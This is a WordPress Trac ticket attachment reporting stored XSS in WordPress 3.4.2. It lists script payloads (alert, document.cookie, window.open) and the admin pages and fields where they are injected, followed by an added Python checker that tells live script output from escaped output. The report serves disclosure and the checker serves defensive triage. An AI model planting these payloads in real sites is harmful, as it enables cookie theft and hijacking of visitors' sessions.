WordPress.org

Make WordPress Core

Ticket #21917: Wordpress XSS Vuln.txt

File Wordpress XSS Vuln.txt, 2.3 KB (added by nuxbie, 19 months ago)

[ WordPress 3.4.2 - Multiple XSS Vulnerabilities ]

Hello, my name is Catur Febrian (nuxbie).
I have bugs in the new webapp WordPress (last version).
These bugs are XSS (Cross Site Scripting).
WordPress 3.4.2 has multiple vulns.
1. XSS WP-Post.
2. XSS WP-Page.
3. XSS WP-MediaLibrary.

Please, read my exploit report... :-)

Exploit Title: CMS WordPress - Multiple XSS Vulnerabilities
Author       : TheCyberNuxbie [ Catur Febrian ]
E-mail       : root@31337sec.com
Version CMS  : Version 3.4.2 (Last Version)
Category     : WebApps / Content Management System (CMS)
Security Risk: Medium Level
Link Download: http://www.wordpress.org/
Tested On    : Mozilla Firefox + Xampp + Windows 7 x32 ID

[ Information Content ]
WordPress - Web Publishing Software.
http://www.wordpress.org/

[ Vulnerability Details ]
1. XSS WP-Post.
2. XSS WP-Page.
3. XSS WP-MediaLibrary.

[ XSS CODE ]
<script>alert('31337');</script>
<script>alert(document.cookie);</script>
<script>window.open("http://www.google.com/")</script>

- Exploit Report:
1. Create / Edit WP-Post:
Input "Title Post" with Script XSS.
<script>alert('31337');</script>
http://wordpress/wp-admin/post-new.php <--- Publish.
View XSS: http://wordpress/?p=xxx <--- XSSed.
PIC: http://31337sec.com/wordpress/xss-post1.jpg + http://31337sec.com/wordpress/xss-post2.jpg

2. Create / Edit WP-Page:
Input "Title Page" with Script XSS.
<script>alert('31337');</script>
http://wordpress/wp-admin/post-new.php?post_type=page <--- Publish.
View XSS: http://wordpress/?page_id=xxx <--- XSSed.
PIC: http://31337sec.com/wordpress/xss-page1.jpg + http://31337sec.com/wordpress/xss-page2.jpg

3. Add / Edit WP-Media Library:
Upload files via Media Library.
http://wordpress/wp-admin/media-new.php <--- Select File.
Upload Files, Save...!!!
Input Form "Title", "Caption", "Description" with Script XSS <--- Save All Changes.
View XSS: http://wordpress/?attachment_id=xxx <--- XSSed.
PIC: http://31337sec.com/wordpress/xss-media1.jpg + http://31337sec.com/wordpress/xss-media2.jpg + http://31337sec.com/wordpress/xss-media3.jpg

- Script XSS will be affected:
1. Frontend Website (post).
http://wordpress/?p=xxx <--- XSSed.
2. Frontend Website (page).
http://wordpress/?page_id=xxx <--- XSSed.
3. Frontend Website (attachment).
http://wordpress/?attachment_id=xxx <--- XSSed.

Thanks...
TheCyberNuxbie
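
Added example (not part of the attached report and not WordPress code): a triage check for a report like the one above, which parses the rendered HTML of each front-end view and tells whether the stored test value came back as a live script element or as escaped text. The sample responses, the names ProbeFinder, classify and triage, and the restriction to element content (attribute values are not examined) are assumptions of this example.

```python
import html
from html.parser import HTMLParser

# Test value copied from the report's "[ XSS CODE ]" list.
PROBE = "<script>alert('31337');</script>"
MARKER = "alert('31337');"

class ProbeFinder(HTMLParser):
    """Records how MARKER appears once the page has been parsed as HTML."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.in_script = False
        self.hits = set()  # "raw" and/or "escaped"

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # Inside <script> the marker is code; anywhere else it is inert text,
        # which means the stored value was entity-escaped on output.
        if MARKER in data:
            self.hits.add("raw" if self.in_script else "escaped")

def classify(rendered_html):
    """Return 'raw', 'escaped' or 'absent' for one rendered view."""
    finder = ProbeFinder()
    finder.feed(rendered_html)
    finder.close()  # flush text buffered at the end of the input
    if "raw" in finder.hits:
        return "raw"
    return "escaped" if finder.hits else "absent"

# Constructed responses (not captured from a real site), keyed by the three
# front-end views the report lists.
SAMPLES = {
    "?p=xxx": "<h1>" + PROBE + "</h1>",
    "?page_id=xxx": "<h1>" + html.escape(PROBE) + "</h1>",
    "?attachment_id=xxx": "<h1>photo</h1><p>caption</p>",
}

def triage(samples):
    """Classify every view so unescaped output stands out in one pass."""
    return {view: classify(body) for view, body in samples.items()}
```

A view classified as "raw" is one where the field is written to the page without output escaping; "escaped" means the same stored value is rendered harmlessly.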